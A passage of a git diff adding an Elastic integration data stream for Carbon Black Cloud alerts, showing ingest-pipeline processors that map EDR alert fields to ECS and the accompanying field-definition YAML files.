json.backend_update_timestamp + target_field: _id + ignore_missing: true + - set: + field: event.kind + value: alert + - rename: + field: json.id + target_field: event.id + ignore_missing: true + - date: + field: json.detection_timestamp + if: ctx.json?.detection_timestamp != null && ctx.json.detection_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.detection_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.first_event_timestamp + target_field: event.start + if: ctx.json?.first_event_timestamp != null && ctx.json.first_event_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.first_event_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.last_event_timestamp + target_field: event.end + if: ctx.json?.last_event_timestamp != null && ctx.json.last_event_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.last_event_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.severity + target_field: event.severity + type: long + ignore_missing: true + on_failure: + - remove: + field: json.severity + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.reason + target_field: event.reason + ignore_missing: true + - convert: + field: json.device_id + target_field: host.id + type: string + ignore_missing: true + ignore_failure: true + - set: + field: host.os.type + value: windows + if: ctx.json?.device_os == 'WINDOWS' + - set: + field: host.os.type + value: linux + if: ctx.json?.device_os == 'LINUX' + - set: + field: host.os.type + value: macos + if: ctx.json?.device_os == 'MAC' + - rename: + field: json.device_os_version + target_field: host.os.version + ignore_missing: true + - rename: + field: json.device_name + target_field: host.hostname + ignore_missing: true + - grok: + field: host.hostname + patterns: + - '^(%{DATA:user.domain})\\(%{GREEDYDATA:host.hostname})$' + ignore_missing: true + ignore_failure: true + - set: + field: host.name + value: '{{{host.hostname}}}' + ignore_failure: true + - append: + field: related.hosts + value: '{{{host.hostname}}}' + if: ctx.host?.hostname != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.device_username + target_field: user.name + ignore_missing: true + - grok: + field: user.name + patterns: + - '^(%{DATA:user.domain})\\(%{GREEDYDATA:user.name})$' + ignore_missing: true + ignore_failure: true + - append: + field: related.hosts + value: '{{{user.domain}}}' + if: ctx.user?.domain != null + allow_duplicates: false + ignore_failure: true + - append: + field: related.user + value: '{{{user.name}}}' + if: ctx.user?.name != null + allow_duplicates: false + ignore_failure: true + # carbon_black_cloud fields + - date: + field: json.backend_timestamp + target_field: carbon_black_cloud.alert.backend_timestamp + if: ctx.json?.backend_timestamp != null && ctx.json.backend_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.backend_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.backend_update_timestamp + target_field: carbon_black_cloud.alert.backend_update_timestamp + if: ctx.json?.backend_update_timestamp != null && ctx.json.backend_update_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.backend_update_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.user_update_timestamp + target_field: carbon_black_cloud.alert.user_update_timestamp + if: ctx.json?.user_update_timestamp != null && ctx.json.user_update_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: json.user_update_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - foreach: + field: json.ttps + if: ctx.json?.ttps instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.ttps + value: '{{{_ingest._value}}}' + allow_duplicates: false + - foreach: + field: json.threat_category + if: ctx.json?.threat_category instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.threat_category + value: '{{{_ingest._value}}}' + allow_duplicates: false + - foreach: + field: json.ml_classification_anomalies + if: ctx.json?.ml_classification_anomalies instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.ml_classification_anomalies + value: '{{{_ingest._value}}}' + allow_duplicates: false + - convert: + field: json.alert_notes_present + target_field: carbon_black_cloud.alert.alert_notes_present + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.alert_notes_present + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.threat_notes_present + target_field: carbon_black_cloud.alert.threat_notes_present + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.threat_notes_present + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.additional_events_present + target_field: carbon_black_cloud.alert.additional_events_present + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.additional_events_present + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.alert_url + target_field: carbon_black_cloud.alert.url + ignore_missing: true + - rename: + field: json.primary_event_id + target_field: carbon_black_cloud.alert.primary_event_id + ignore_missing: true + - rename: + field: json.org_key + target_field: carbon_black_cloud.alert.organization_key + ignore_missing: true + - rename: + field: json.vendor_name + target_field: carbon_black_cloud.alert.vendor_name + ignore_missing: true + - rename: + field: json.product_name + target_field: carbon_black_cloud.alert.product_name + ignore_missing: true + - rename: + field: json.serial_number + target_field: carbon_black_cloud.alert.serial_number + ignore_missing: true + - rename: + field: json.threat_id + target_field: carbon_black_cloud.alert.threat_id + ignore_missing: true + - rename: + field: json.policy_applied + target_field: carbon_black_cloud.alert.policy_applied + ignore_missing: true + # carbon_black_cloud parent process fields & ecs parent process fields + - rename: + field: json.parent_name + target_field: process.parent.name + ignore_missing: true + - set: + field: process.parent.executable + copy_from: process.parent.name + ignore_empty_value: true + - set: + field: carbon_black_cloud.alert.parent.name + copy_from: process.parent.name + ignore_empty_value: true + - rename: + field: json.parent_cmdline + target_field: process.parent.command_line + ignore_missing: true + - set: + field: carbon_black_cloud.alert.parent.cmdline + copy_from: process.parent.command_line + ignore_empty_value: true + - rename: + field: json.parent_guid + target_field: process.parent.entity_id + ignore_missing: true + - set: + field: carbon_black_cloud.alert.parent.guid + copy_from: process.parent.entity_id + ignore_empty_value: true + - rename: + field: json.parent_pid + target_field: process.parent.pid + ignore_missing: true + - set: + field: carbon_black_cloud.alert.parent.pid + copy_from: process.parent.pid + ignore_empty_value: true + - rename: + field: json.parent_sha256 + target_field: process.parent.hash.sha256 + ignore_missing: true + - set: + field: carbon_black_cloud.alert.parent.hash.sha256 + copy_from: process.parent.hash.sha256 + ignore_empty_value: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.parent.hash.sha256}}}' + if: ctx.carbon_black_cloud?.alert?.parent?.hash?.sha256 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.parent_md5 + target_field: process.parent.hash.md5 + ignore_missing: true + - set: + field: carbon_black_cloud.alert.parent.hash.md5 + copy_from: process.parent.hash.md5 + ignore_empty_value: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.parent.hash.md5}}}' + if: ctx.carbon_black_cloud?.alert?.parent?.hash?.md5 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.parent_username + target_field: carbon_black_cloud.alert.parent.username + ignore_missing: true + - rename: + field: json.parent_reputation + target_field: carbon_black_cloud.alert.parent.reputation + ignore_missing: true + - rename: + field: json.parent_effective_reputation + target_field: carbon_black_cloud.alert.parent.effective_reputation + ignore_missing: true + - script: + description: Removes complete path from ecs field parent.process.name + lang: painless + if: ctx?.process?.parent?.name != null + source: | + ctx.process.parent.name = ctx.process.parent.name.substring(ctx.process.parent.name.lastIndexOf('\\') + 1); +# carbon_black_cloud process fields & ecs process fields + - foreach: + field: json.process_issuer + if: ctx.json?.process_issuer instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.process.issuer + value: '{{{_ingest._value}}}' + allow_duplicates: false + - foreach: + field: json.process_publisher + if: ctx.json?.process_publisher instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.process.publisher + value: '{{{_ingest._value}}}' + allow_duplicates: false + - rename: + field: json.process_name + target_field: process.name + ignore_missing: true + - set: + field: process.executable + copy_from: process.name + ignore_empty_value: true + - set: + field: carbon_black_cloud.alert.process.name + copy_from: process.name + ignore_empty_value: true + - rename: + field: json.process_username + target_field: carbon_black_cloud.alert.process.username + ignore_missing: true + - rename: + field: json.process_cmdline + target_field: process.command_line + ignore_missing: true + - set: + field: carbon_black_cloud.alert.process.cmdline + copy_from: process.command_line + ignore_empty_value: true + - rename: + field: json.process_guid + target_field: process.entity_id + ignore_missing: true + - set: + field: carbon_black_cloud.alert.process.guid + copy_from: process.entity_id + ignore_empty_value: true + - rename: + field: json.process_pid + target_field: process.pid + ignore_missing: true + - set: + field: carbon_black_cloud.alert.process.pid + copy_from: process.pid + ignore_empty_value: true + - rename: + field: json.process_sha256 + target_field: process.hash.sha256 + ignore_missing: true + - set: + field: carbon_black_cloud.alert.process.hash.sha256 + copy_from: process.hash.sha256 + ignore_empty_value: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.process.hash.sha256}}}' + if: ctx.carbon_black_cloud?.alert?.process?.hash?.sha256 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.process_md5 + target_field: process.hash.md5 + ignore_missing: true + - set: + field: carbon_black_cloud.alert.process.hash.md5 + copy_from: process.hash.md5 + ignore_empty_value: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.process.hash.md5}}}' + if: ctx.carbon_black_cloud?.alert?.process?.hash?.md5 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.process_reputation + target_field: carbon_black_cloud.alert.process.reputation + ignore_missing: true + - rename: + field: json.process_effective_reputation + target_field: carbon_black_cloud.alert.process.effective_reputation + ignore_missing: true + - script: + description: Removes complete path from ecs field process.name + lang: painless + if: ctx?.process?.name != null + source: | + ctx.process.name = ctx.process.name.substring(ctx.process.name.lastIndexOf('\\') + 1); + # child process fields + - rename: + field: json.childproc_name + target_field: carbon_black_cloud.alert.childproc.name + ignore_missing: true + - rename: + field: json.childproc_username + target_field: carbon_black_cloud.alert.childproc.username + ignore_missing: true + - rename: + field: json.childproc_cmdline + target_field: carbon_black_cloud.alert.childproc.cmdline + ignore_missing: true + - rename: + field: json.childproc_guid + target_field: carbon_black_cloud.alert.childproc.guid + ignore_missing: true + - rename: + field: json.childproc_sha256 + target_field: carbon_black_cloud.alert.childproc.hash.sha256 + ignore_missing: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.childproc.hash.sha256}}}' + if: ctx.carbon_black_cloud?.alert?.childproc?.hash?.sha256 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.childproc_md5 + target_field: carbon_black_cloud.alert.childproc.hash.md5 + ignore_missing: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.childproc.hash.md5}}}' + if: ctx.carbon_black_cloud?.alert?.childproc?.hash?.md5 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.childproc_effective_reputation + target_field: carbon_black_cloud.alert.childproc.effective_reputation + ignore_missing: true + # blocked process fields + - rename: + field: json.blocked_name + target_field: carbon_black_cloud.alert.blocked_process.name + ignore_missing: true + - rename: + field: json.blocked_sha256 + target_field: carbon_black_cloud.alert.blocked_process.hash.sha256 + ignore_missing: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.blocked_process.hash.sha256}}}' + if: ctx.carbon_black_cloud?.alert?.blocked_process?.hash?.sha256 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.blocked_md5 + target_field: carbon_black_cloud.alert.blocked_process.hash.md5 + ignore_missing: true + - append: + field: related.hash + value: '{{{carbon_black_cloud.alert.blocked_process.hash.md5}}}' + if: ctx.carbon_black_cloud?.alert?.blocked_process?.hash?.md5 != null + allow_duplicates: false + ignore_failure: true + - rename: + field: json.blocked_effective_reputation + target_field: carbon_black_cloud.alert.blocked_process.effective_reputation + ignore_missing: true + # ioc fields + - rename: + field: json.ioc_field + target_field: carbon_black_cloud.alert.ioc.field + ignore_missing: true + - rename: + field: json.ioc_hit + target_field: carbon_black_cloud.alert.ioc.hit + ignore_missing: true + - rename: + field: json.ioc_id + target_field: carbon_black_cloud.alert.ioc.id + ignore_missing: true + # report fields + - foreach: + field: json.report_tags + if: ctx.json?.report_tags instanceof List + ignore_missing: true + processor: + append: + field: carbon_black_cloud.alert.report.tags + value: '{{{_ingest._value}}}' + allow_duplicates: false + - rename: + field: json.report_id + target_field: carbon_black_cloud.alert.report.id + ignore_missing: true + - rename: + field: json.report_name + target_field: carbon_black_cloud.alert.report.name + ignore_missing: true + - rename: + field: json.report_description + target_field: carbon_black_cloud.alert.report.description + ignore_missing: true + - rename: + field: json.report_link + target_field: carbon_black_cloud.alert.report.link + ignore_missing: true + # device fields + - rename: + field: json.device_location + target_field: carbon_black_cloud.alert.device.location + ignore_missing: true + - rename: + field: json.device_os + target_field: carbon_black_cloud.alert.device.os + ignore_missing: true + - rename: + field: json.device_policy_id + target_field: carbon_black_cloud.alert.device.policy_id + ignore_missing: true + - rename: + field: json.device_policy + target_field: carbon_black_cloud.alert.device.policy + ignore_missing: true + - rename: + field: json.device_target_value + target_field: carbon_black_cloud.alert.device.target_value + ignore_missing: true + - rename: + field: json.device_external_ip + target_field: carbon_black_cloud.alert.device.external_ip + ignore_missing: true + - rename: + field: json.device_internal_ip + target_field: carbon_black_cloud.alert.device.internal_ip + ignore_missing: true + - rename: + field: json.device_uem_id + target_field: carbon_black_cloud.alert.device.uem_id + ignore_missing: true + # workflow fields + - rename: + field: json.workflow + target_field: carbon_black_cloud.alert.workflow + ignore_missing: true + - date: + field: carbon_black_cloud.alert.workflow.change_timestamp + target_field: carbon_black_cloud.alert.workflow.change_timestamp + if: ctx.carbon_black_cloud?.alert?.workflow?.change_timestamp != null && ctx.carbon_black_cloud.alert.workflow.change_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: carbon_black_cloud.alert.workflow.change_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + # determination fields + - rename: + field: json.determination + target_field: carbon_black_cloud.alert.determination + ignore_missing: true + - date: + field: carbon_black_cloud.alert.determination.change_timestamp + target_field: carbon_black_cloud.alert.determination.change_timestamp + if: ctx.carbon_black_cloud?.alert?.determination?.change_timestamp != null && ctx.carbon_black_cloud.alert.determination.change_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: carbon_black_cloud.alert.determination.change_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + # mdr fields + - convert: + field: json.mdr_alert + target_field: carbon_black_cloud.alert.mdr.alert + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.mdr_alert + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.mdr_alert_notes_present + target_field: carbon_black_cloud.alert.mdr.alert_notes_present + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.mdr_alert_notes_present + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.mdr_threat_notes_present + target_field: carbon_black_cloud.alert.mdr.threat_notes_present + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.mdr_threat_notes_present + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.mdr_determination + target_field: carbon_black_cloud.alert.mdr.determination + ignore_missing: true + - date: + field: carbon_black_cloud.alert.mdr.determination.change_timestamp + target_field: carbon_black_cloud.alert.mdr.determination.change_timestamp + if: ctx.carbon_black_cloud?.alert?.mdr?.determination?.change_timestamp != null && ctx.carbon_black_cloud.alert.mdr.determination.change_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: carbon_black_cloud.alert.mdr.determination.change_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.mdr_workflow + target_field: carbon_black_cloud.alert.mdr.workflow + ignore_missing: true + - date: + field: carbon_black_cloud.alert.mdr.workflow.change_timestamp + target_field: carbon_black_cloud.alert.mdr.workflow.change_timestamp + if: ctx.carbon_black_cloud?.alert?.mdr?.workflow?.change_timestamp != null && ctx.carbon_black_cloud.alert.mdr.workflow.change_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: carbon_black_cloud.alert.mdr.workflow.change_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.mdr_classification + target_field: carbon_black_cloud.alert.mdr.classification + ignore_missing: true + - date: + field: carbon_black_cloud.alert.mdr.classification.change_timestamp + target_field: carbon_black_cloud.alert.mdr.classification.change_timestamp + if: ctx.carbon_black_cloud?.alert?.mdr?.classification?.change_timestamp != null && ctx.carbon_black_cloud.alert.mdr.classification.change_timestamp != '' + formats: + - ISO8601 + on_failure: + - remove: + field: carbon_black_cloud.alert.mdr.classification.change_timestamp + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + # netconn fields + - convert: + field: json.netconn_remote_port + target_field: carbon_black_cloud.alert.netconn.remote_port + type: integer + ignore_missing: true + on_failure: + - remove: + field: json.netconn_remote_port + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_local_port + target_field: carbon_black_cloud.alert.netconn.local_port + type: integer + ignore_missing: true + on_failure: + - remove: + field: json.netconn_local_port + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_remote_ip + target_field: carbon_black_cloud.alert.netconn.remote_ip + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_remote_ip + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_local_ip + target_field: carbon_black_cloud.alert.netconn.local_ip + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_local_ip + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_remote_ipv4 + target_field: carbon_black_cloud.alert.netconn.remote_ipv4 + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_remote_ipv4 + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_local_ipv4 + target_field: carbon_black_cloud.alert.netconn.local_ipv4 + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_local_ipv4 + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_remote_ipv6 + target_field: carbon_black_cloud.alert.netconn.remote_ipv6 + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_remote_ipv6 + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.netconn_local_ipv6 + target_field: carbon_black_cloud.alert.netconn.local_ipv6 + type: ip + ignore_missing: true + on_failure: + - remove: + field: json.netconn_local_ipv6 + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.netconn_protocol + target_field: carbon_black_cloud.alert.netconn.protocol + ignore_missing: true + - rename: + field: json.netconn_remote_domain + target_field: carbon_black_cloud.alert.netconn.remote_domain + ignore_missing: true + # misc fields + - convert: + field: json.ip_reputation + target_field: carbon_black_cloud.alert.ip_reputation + type: integer + ignore_missing: true + on_failure: + - remove: + field: json.ip_reputation + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.remote_is_private + target_field: carbon_black_cloud.alert.remote_is_private + type: boolean + ignore_missing: true + on_failure: + - remove: + field: json.remote_is_private + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: carbon_black_cloud.alert.category + value: 'THREAT' + # cleanup & final additions + - remove: + field: event.original + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + ignore_failure: true + ignore_missing: true + - remove: + field: + - json.severity + - json.detection_timestamp + - json.backend_timestamp + - json.backend_update_timestamp + - json.user_update_timestamp + - json.first_event_timestamp + - json.last_event_timestamp + - json.device_id + - json.alert_notes_present + - json.threat_notes_present + - json.additional_events_present + - json.netconn_remote_port + - json.netconn_local_port + - json.netconn_remote_ip + - json.netconn_local_ip + - json.netconn_remote_ipv4 + - json.netconn_local_ipv4 + - json.netconn_remote_ipv6 + - json.netconn_local_ipv6 + - json.mdr_classification?.determination + - json.ml_classification_anomalies + - json.ip_reputation + - json.remote_is_private + - json.mdr_alert + - json.mdr_alert_notes_present + - json.mdr_threat_notes_present + - json.process_issuer + - json.process_publisher + - json.report_tags + ignore_missing: true + - script: + description: Adds all the remaining fields in fields under carbon_black_cloud.alert. + lang: painless + if: ctx.json != null + source: | + for (Map.Entry m : ctx.json.entrySet()) { + ctx.carbon_black_cloud.alert[m.getKey()] = m.getValue(); + } + - remove: + field: json + ignore_missing: true + - script: + description: Drops null/empty values recursively. + lang: painless + source: | + boolean dropEmptyFields(Object object) { + if (object == null || object == '') { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(value -> dropEmptyFields(value)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(value -> dropEmptyFields(value)); + return (((List) object).length == 0); + } + return false; + } + dropEmptyFields(ctx); +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/fields/agent.yml b/packages/carbon_black_cloud/data_stream/alert_v7/fields/agent.yml new file mode 100644 index 00000000000..bf2dfff6756 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/fields/agent.yml @@ -0,0 +1,171 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type +- name: log.offset + type: long + description: Log offset diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/fields/base-fields.yml b/packages/carbon_black_cloud/data_stream/alert_v7/fields/base-fields.yml new file mode 100644 index 00000000000..b0dd32372c4 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/fields/base-fields.yml @@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. +- name: event.module + type: constant_keyword + description: Event module. + value: carbon_black_cloud +- name: event.dataset + type: constant_keyword + description: Event dataset. + value: carbon_black_cloud.alert_v7 diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/fields/ecs.yml b/packages/carbon_black_cloud/data_stream/alert_v7/fields/ecs.yml new file mode 100644 index 00000000000..397d0af5c9e --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/fields/ecs.yml @@ -0,0 +1,58 @@ +- external: ecs + name: ecs.version +- external: ecs + name: event.created +- external: ecs + name: event.end +- external: ecs + name: event.id +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.reason +- external: ecs + name: event.severity +- external: ecs + name: event.start +- external: ecs + name: process.entity_id +- external: ecs + name: process.executable +- external: ecs + name: process.name +- external: ecs + name: process.command_line +- external: ecs + name: process.pid +- external: ecs + name: process.hash.sha256 +- external: ecs + name: process.hash.md5 +- external: ecs + name: process.parent.entity_id +- external: ecs + name: process.parent.executable +- external: ecs + name: process.parent.name +- external: ecs + name: process.parent.command_line +- external: ecs + name: process.parent.pid +- external: ecs + name: process.parent.hash.sha256 +- external: ecs + name: process.parent.hash.md5 +- external: ecs + name: related.hash +- external: ecs + name: related.hosts +- external: ecs + name: related.user +- external: ecs + name: tags +- external: ecs + name: user.domain +- external: ecs + name: user.name diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/fields/fields.yml b/packages/carbon_black_cloud/data_stream/alert_v7/fields/fields.yml new file mode 100644 index 00000000000..2534a8cb08e --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/fields/fields.yml @@ -0,0 +1,493 @@ +- name: carbon_black_cloud.alert + 